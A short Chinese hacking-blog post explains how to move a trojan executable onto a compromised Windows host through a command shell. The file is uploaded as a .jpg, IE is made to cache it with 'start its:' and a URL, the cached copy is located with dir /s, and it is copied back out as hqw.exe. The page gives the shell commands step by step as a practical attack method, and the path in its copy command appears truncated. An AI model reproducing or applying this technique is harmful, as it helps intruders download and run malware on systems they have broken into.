CMDShell下文件上传又一意想不到的方法—缓存的利用

  • A+
所属分类:[开发技巧]

原理就不多说了,把要上传的文件或木马的exe后缀名改成jpg或gif等可以上传到网站空间上的文件类型。
打个比方上传后的地址为:http://www.hack520.org/hqw.jpg。我们在Shell下输入:start its: http://www.hack520.org/hqw.jpg。这样会把hqw.jpg下载到IE的临时文件夹中,这些下载的临时文件的命名有一个特点,就是会保存成hqw[1].jpg,如果有其它同名的情况,还可能会保存为hqw[2].jpg一类的。如果是exe文件就会提示下载,这样没有达到我们的目的。
我们用dir /s hqw[1].jpg这个命令来搜索具体的目录。如图,搜索出来的路径为:
C:\Documents and Settings\hqw20\Local Settings\Temporary Internet Files\Content
.IE5\89OVGV07 的目录

然后用退出到C盘根目录,用命令
copy “C:\Documents and Settings\hqw20\Local Settings\Temporary Internet Files\Content
.IE5\89OVGV07 ” hqw.exe
就可以将我hqw[1].jpg还原成hqw.exe,此时hqw.exe处于C盘根本目录。


看看hqw.exe是否正常运行,完全正常.

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin
广告也精彩
avatar
广告也精彩

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: